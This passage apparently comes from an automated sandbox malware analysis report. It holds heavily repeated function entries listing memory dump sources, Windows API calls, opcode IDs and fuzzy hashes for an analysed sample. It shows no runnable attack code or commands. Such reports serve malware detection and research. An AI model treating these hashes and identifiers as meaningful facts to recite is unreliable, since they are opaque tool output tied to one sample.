                                                                                                                                                                                                • Associated: 00000000.00000002.1771838515.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771854943.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771872547.0000000001137000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771889671.000000000113B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771905564.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771920982.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771937022.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771952031.0000000001147000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771968014.000000000114F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771982640.0000000001150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771998260.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772013221.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772033133.0000000001176000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772091483.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772107669.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772122219.00000000011C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772137754.00000000011CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772152322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772168688.00000000011DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772183931.00000000011DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                • Opcode ID: f38f4799eeadc9cd50b414d9fb2e11bfb34e85c6247e10f3b874462affb5a597
                                                                                                                                                                                                • Instruction ID: 54a51b130a38c2c9ceb54c8d0d9ec5278a61ff551774d56300b19a7aaaddf6c3
                                                                                                                                                                                                • Opcode Fuzzy Hash: f38f4799eeadc9cd50b414d9fb2e11bfb34e85c6247e10f3b874462affb5a597
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8EF0543264916CA6EB296A669C02A7B3F9B9B417F0B25B121AF04F7191DA20DC0185E0
                                                                                                                                                                                                Function 00EC87B2 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,00ECDA1D,?,?,?,?), ref: 00EC87B9
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1771332626.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1771315072.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771332626.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771389931.0000000000F29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771405767.0000000000F2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771424131.0000000000F37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771530382.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771548808.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771570054.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771586419.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771635794.00000000010C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771651583.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771667881.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771683261.00000000010CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771704218.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771720321.00000000010EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771737620.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771754017.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771774087.0000000001111000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771790150.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771805211.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771821455.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771838515.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771854943.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771872547.0000000001137000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771889671.000000000113B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771905564.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771920982.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771937022.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771952031.0000000001147000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771968014.000000000114F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771982640.0000000001150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771998260.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772013221.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772033133.0000000001176000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772091483.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772107669.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772122219.00000000011C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772137754.00000000011CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772152322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772168688.00000000011DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772183931.00000000011DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                • Opcode ID: 72efc863de2e599c68b77320ef5df4bad24e23b58bf6ae5af173cf408b0d432a
                                                                                                                                                                                                • Instruction ID: 84d1535d11cb5d5c9fc4cc43eff3c5b1b9ff83c7a1424a9beacfe48944c94041
                                                                                                                                                                                                • Opcode Fuzzy Hash: 72efc863de2e599c68b77320ef5df4bad24e23b58bf6ae5af173cf408b0d432a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 23C08C3822160026FD1C06384388EA8334699877A83F83B8DE071EB1F2FA3758079210
                                                                                                                                                                                                Function 00EC87B0 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,00ECDA1D,?,?,?,?), ref: 00EC87B9
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1771332626.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1771315072.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771332626.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771389931.0000000000F29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771405767.0000000000F2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771424131.0000000000F37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771530382.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771548808.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771570054.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771586419.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771635794.00000000010C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771651583.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771667881.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771683261.00000000010CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771704218.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771720321.00000000010EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771737620.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771754017.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771774087.0000000001111000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771790150.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771805211.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771821455.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771838515.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771854943.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771872547.0000000001137000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771889671.000000000113B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771905564.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771920982.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771937022.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771952031.0000000001147000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771968014.000000000114F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771982640.0000000001150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771998260.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772013221.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772033133.0000000001176000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772091483.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772107669.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772122219.00000000011C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772137754.00000000011CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772152322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772168688.00000000011DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772183931.00000000011DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                • Opcode ID: c89fcff7a048be8591bed44fb04a0af938333bc0074b424a78640989fb58bb22
                                                                                                                                                                                                • Instruction ID: c6c964e255ebd01cd4d7b70f7841967a5f561e63c95476be5fcf812c71c391aa
                                                                                                                                                                                                • Opcode Fuzzy Hash: c89fcff7a048be8591bed44fb04a0af938333bc0074b424a78640989fb58bb22
                                                                                                                                                                                                • Instruction Fuzzy Hash: 02C0123411110056A91C46284348D24320599427183F42A4DD031AB1E2FA3384038650
                                                                                                                                                                                                Function 00ECB1A0 Relevance: 1.5, APIs: 1, Instructions: 244COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00ECB3C7
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1771332626.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1771315072.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771332626.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771389931.0000000000F29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771405767.0000000000F2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771424131.0000000000F37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771530382.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771548808.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771570054.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771586419.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771635794.00000000010C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771651583.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771667881.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771683261.00000000010CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771704218.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771720321.00000000010EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771737620.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771754017.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771774087.0000000001111000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771790150.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771805211.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771821455.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771838515.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771854943.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771872547.0000000001137000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771889671.000000000113B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771905564.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771920982.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771937022.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771952031.0000000001147000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771968014.000000000114F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771982640.0000000001150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771998260.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772013221.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772033133.0000000001176000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772091483.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772107669.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772122219.00000000011C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772137754.00000000011CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772152322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772168688.00000000011DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772183931.00000000011DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                                                                                • Opcode ID: 3ea43823f2d39724de228fd8e7c82618ffc873613c7bc4872aaabcd51ad05e2e
                                                                                                                                                                                                • Instruction ID: ea1025136dc4f690fdf164c789f8356ed87596f1ba575b00852a167db09431e3
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ea43823f2d39724de228fd8e7c82618ffc873613c7bc4872aaabcd51ad05e2e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 59B11470A10268DFEB28CF18C995BDEB7B5EF15304F5081DDE809A7281D775AA89CF90
                                                                                                                                                                                                Function 05660C73 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1773604194.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_5660000_file.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: a
                                                                                                                                                                                                • API String ID: 0-3904355907
                                                                                                                                                                                                • Opcode ID: be3248be11ab1842845cc10288f26ebc7d561364f7fe0c34006d3df790d03db6
                                                                                                                                                                                                • Instruction ID: a35d2bad678955dc1f74945eaa5271173b7ef81dd2c84bf575352bb8ed723daa
                                                                                                                                                                                                • Opcode Fuzzy Hash: be3248be11ab1842845cc10288f26ebc7d561364f7fe0c34006d3df790d03db6
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8601AC7B50D290AEE311C6615A6C5B67BE9E9C223037085BBF442C7082D3555A5BD371
                                                                                                                                                                                                Function 05660CDE Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1773604194.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_5660000_file.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: ZXXP
                                                                                                                                                                                                • API String ID: 0-4266838394
                                                                                                                                                                                                • Opcode ID: e95f423464060031ca3d52468882602918741c199e1843d8b7977e676b6967a8
                                                                                                                                                                                                • Instruction ID: ee34b705386b992138002cbd3480064a003113955bead99533359625bdf43d1e
                                                                                                                                                                                                • Opcode Fuzzy Hash: e95f423464060031ca3d52468882602918741c199e1843d8b7977e676b6967a8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9DD02BAE04C404EA4550D310AA2D3F5276D7B513713304B31E047978C282981587C271
                                                                                                                                                                                                Function 05660C2A Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1773604194.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_5660000_file.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 0db4d42d93013115d2fea2189c8f3293224369b07be64c8fc72aa8e715cb32ff
                                                                                                                                                                                                • Instruction ID: 0a084950ce1eaf204af191e888061520d69b008e4f88a6c1f91617e7ddedeaef
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0db4d42d93013115d2fea2189c8f3293224369b07be64c8fc72aa8e715cb32ff
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4411BFEB20D114BD7151E5957B2CAFB27AED5C67303308937F842C6542D2A84D8BE235
                                                                                                                                                                                                Function 05660BCB Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1773604194.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_5660000_file.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: ee0d2e9aaf9b58c28974449489fa90b3d52c389d90223792941122e98fb2ffb5
                                                                                                                                                                                                • Instruction ID: afed4656061c52c01b11e813639dda66535fda426b516dcc34236cbb24fd854f
                                                                                                                                                                                                • Opcode Fuzzy Hash: ee0d2e9aaf9b58c28974449489fa90b3d52c389d90223792941122e98fb2ffb5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 801106FB60D140BEB242D665AB6C9BA3FADE9C63303308976F442CB502D1664E4BD271
                                                                                                                                                                                                Function 05660C54 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1773604194.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
